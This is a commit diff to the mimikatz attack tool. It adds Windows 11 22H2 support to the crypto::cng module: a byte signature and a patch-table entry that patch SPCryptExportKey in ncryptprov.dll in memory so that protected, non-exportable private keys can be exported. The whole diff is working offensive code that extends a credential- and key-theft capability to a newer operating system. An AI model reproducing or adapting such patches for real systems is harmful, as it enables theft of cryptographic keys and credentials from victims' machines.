Add crypto::cng patch tested on Win11 x64 22H2 (ncryptprov.dll 10.0.22621.1635)

2025-01-02 19:32:02 +00:00 · 2023-05-09 22:44:29 +10:00 · 2023-05-09 22:44:29 +10:00 · c2ad86550a
commit c2ad86550a
parent 208c1d2db2
2 changed files with 6 additions and 1 deletions
--- a/inc/globals.h
+++ b/inc/globals.h
@ -32,7 +32,7 @@
 #define MIMIKATZ				L"mimikatz"
 #define MIMIKATZ_VERSION		L"2.2.0"
 #define MIMIKATZ_CODENAME		L"A La Vie, A L\'Amour"
-#define MIMIKATZ_MAX_WINBUILD	L"19041"
+#define MIMIKATZ_MAX_WINBUILD	L"22601"
 #define MIMIKATZ_FULL			MIMIKATZ L" " MIMIKATZ_VERSION L" (" MIMIKATZ_ARCH L") #" MIMIKATZ_MAX_WINBUILD L" " TEXT(__DATE__) L" " TEXT(__TIME__)
 #define MIMIKATZ_SECOND			L"\"" MIMIKATZ_CODENAME L"\""
 #define MIMIKATZ_DEFAULT_LOG	MIMIKATZ L".log"
@ -121,6 +121,7 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
 #define KULL_M_WIN_BUILD_10_21H2	19044
 #define KULL_M_WIN_BUILD_10_22H2	19045
 #define KULL_M_WIN_BUILD_2022		20348
+#define KULL_M_WIN_BUILD_11_22H2	22621

 #define KULL_M_WIN_MIN_BUILD_XP		2500
 #define KULL_M_WIN_MIN_BUILD_2K3	3000
@ -131,6 +132,7 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
 #define KULL_M_WIN_MIN_BUILD_10		9800
 #define KULL_M_WIN_MIN_BUILD_11		22000

+
 /* mimikatz 3 transition */
 #define PRINT_ERROR_NUMBER(func, error)	PRINT_ERROR(func L": 0x%08x\n", error)

--- a/mimikatz/modules/crypto/kuhl_m_crypto_patch.c
+++ b/mimikatz/modules/crypto/kuhl_m_crypto_patch.c
@ -114,6 +114,8 @@ BYTE PTRN_W10_1607_SPCryptExportKey[]		= {0xf6, 0x46, 0x24, 0x02, 0x0f, 0x84};
 BYTE PTRN_W10_1703_SPCryptExportKey[]		= {0xf6, 0x46, 0x24, 0x0a, 0x0f, 0x84};
 BYTE PTRN_W10_1809_SPCryptExportKey[]		= {0xf6, 0x45, 0x24, 0x02, 0x0f, 0x84};
 BYTE PTRN_W10_20H2_SPCryptExportKey[]		= {0xf6, 0x45, 0x24, 0x02, 0x75, 0x46};
+BYTE PTRN_W11_22H2_SPCryptExportKey[]		= {0xf6, 0x46, 0x24, 0x02, 0x75, 0x2d};
+
 BYTE PATC_WI60_SPCryptExportKey_EXPORT[]	= {0x90, 0xe9};
 KULL_M_PATCH_GENERIC CngReferences[] = {
 	{KULL_M_WIN_BUILD_VISTA,	{sizeof(PTRN_WI60_SPCryptExportKey),	PTRN_WI60_SPCryptExportKey},	{sizeof(PATC_WI60_SPCryptExportKey_EXPORT), PATC_WI60_SPCryptExportKey_EXPORT}, {4}}, //last parameter is offset from start of search pattern where patch will be applied
@ -129,6 +131,7 @@ KULL_M_PATCH_GENERIC CngReferences[] = {
 	{KULL_M_WIN_BUILD_10_20H2,	{sizeof(PTRN_W10_20H2_SPCryptExportKey),PTRN_W10_20H2_SPCryptExportKey},{sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}}, //ncryptprov.dll 10.0.19041.1620 or .2193
 	{KULL_M_WIN_BUILD_10_21H2,	{sizeof(PTRN_W10_20H2_SPCryptExportKey),PTRN_W10_20H2_SPCryptExportKey},{sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}}, //ncryptprov.dll 10.0.19041.1620 or .2193
 	{KULL_M_WIN_BUILD_10_22H2,	{sizeof(PTRN_W10_20H2_SPCryptExportKey),PTRN_W10_20H2_SPCryptExportKey},{sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}}, //ncryptprov.dll 10.0.19041.1620 or .2193
+	{KULL_M_WIN_BUILD_11_22H2,	{sizeof(PTRN_W11_22H2_SPCryptExportKey),PTRN_W11_22H2_SPCryptExportKey},{sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}}, //ncryptprov.dll 10.0.22621.1635 and maybe others

 };
 #elif defined _M_IX86